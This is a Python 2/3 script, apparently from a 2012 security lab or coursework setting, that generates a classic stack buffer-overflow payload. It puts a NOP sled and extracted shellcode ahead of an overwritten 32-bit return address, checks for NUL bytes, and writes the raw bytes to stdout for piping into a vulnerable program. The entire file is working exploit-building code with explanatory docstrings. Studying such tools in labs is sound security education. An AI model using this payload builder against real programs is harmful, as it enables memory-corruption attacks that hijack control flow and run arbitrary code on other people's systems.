#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# $File: mkexploit.py
# $Date: Sun Jun 17 23:54:32 2012 +0800
# $Author: jiakai <jia.kai66@gmail.com>

import sys
import struct

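def mkexploit(objpath, offset, retaddr, shellcode=None):
    """Build a classic stack-smashing payload: NOP sled + shellcode + return address.

    Layout of the returned payload: ``offset`` bytes made of a 0x90 NOP sled
    padded in front of the shellcode, followed by ``retaddr`` packed as a
    32-bit little-endian unsigned integer, ``offset + 4`` bytes in total.

    Args:
        objpath: path handed to ``dump.get_shell_code`` to obtain the shellcode
            bytes.  Ignored when ``shellcode`` is given.
        offset: number of payload bytes emitted before the return address
            (i.e. the distance from the start of the overflowed buffer to the
            saved return address, as the caller measured it).
        retaddr: value written over the saved return address; must fit in 32
            bits.  For the sled to be useful it should point into the NOP run
            rather than past the shellcode -- not checked here.
        shellcode: optional pre-built shellcode bytes, used instead of
            extracting them from ``objpath``.

    Returns:
        The payload as ``bytes`` (``str`` on Python 2).

    Exits:
        via ``sys.exit`` when the shellcode does not fit in ``offset`` bytes,
        contains a NUL byte, or ``retaddr`` is not an unsigned 32-bit value.
    """
    # Byte literals keep the payload a single type on both Python 2 (where
    # b"" is str) and Python 3 (where struct.pack returns bytes).
    NOP = b"\x90"
    if shellcode is None:
        from dump import get_shell_code
        shellcode = get_shell_code(objpath)
    if len(shellcode) > offset:
        sys.exit("shell code too loooooong")
    # Working assumption of this tool: the overflow goes through a C-string
    # style copy that stops at the first NUL, so a NUL inside the shellcode
    # would truncate the payload before the return address lands.
    if b'\x00' in shellcode:
        sys.exit('"\\x00" in code')
    try:
        packed = struct.pack("<I", retaddr)
    except struct.error:
        # struct's own message is cryptic; report it in the tool's style.
        sys.exit("retaddr must be an unsigned 32-bit value, got %r" % (retaddr,))
    # Same assumption applied to the address itself: a NUL anywhere but in the
    # trailing byte cuts a C-string copy short of the saved return address.
    # The copy primitive is not known here, so warn instead of refusing.
    if b'\x00' in packed[:-1]:
        sys.stderr.write("warning: NUL byte inside packed retaddr 0x%08x\n"
                         % retaddr)
    return NOP * (offset - len(shellcode)) + shellcode + packed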

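if __name__ == '__main__':
    # Command-line entry point: <shellcode object> <hex offset> <hex retaddr>.
    argv = sys.argv
    if len(argv) != 4:
        sys.exit("usage: {0} <shell exec> 0x<retaddr offset> 0x<retaddr>"
                .format(argv[0]))
    # Both numeric arguments are hex; int(x, 16) accepts them with or without
    # the "0x" prefix.  A malformed number becomes a usage-style error instead
    # of a traceback.
    try:
        offset = int(argv[2], 16)
        retaddr = int(argv[3], 16)
    except ValueError as err:
        sys.exit("invalid hex argument: {0}".format(err))
    payload = mkexploit(argv[1], offset, retaddr)
    # Emit the raw payload followed by a newline, as the original `print`
    # statement did.  On Python 3 sys.stdout is a text stream, so write to its
    # underlying binary buffer when one exists.  The newline acts as a line
    # terminator for gets()/fgets()-style readers and is stripped by shell
    # command substitution, but it is an extra byte for read()-style targets.
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(payload + b"\n")
    out.flush()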

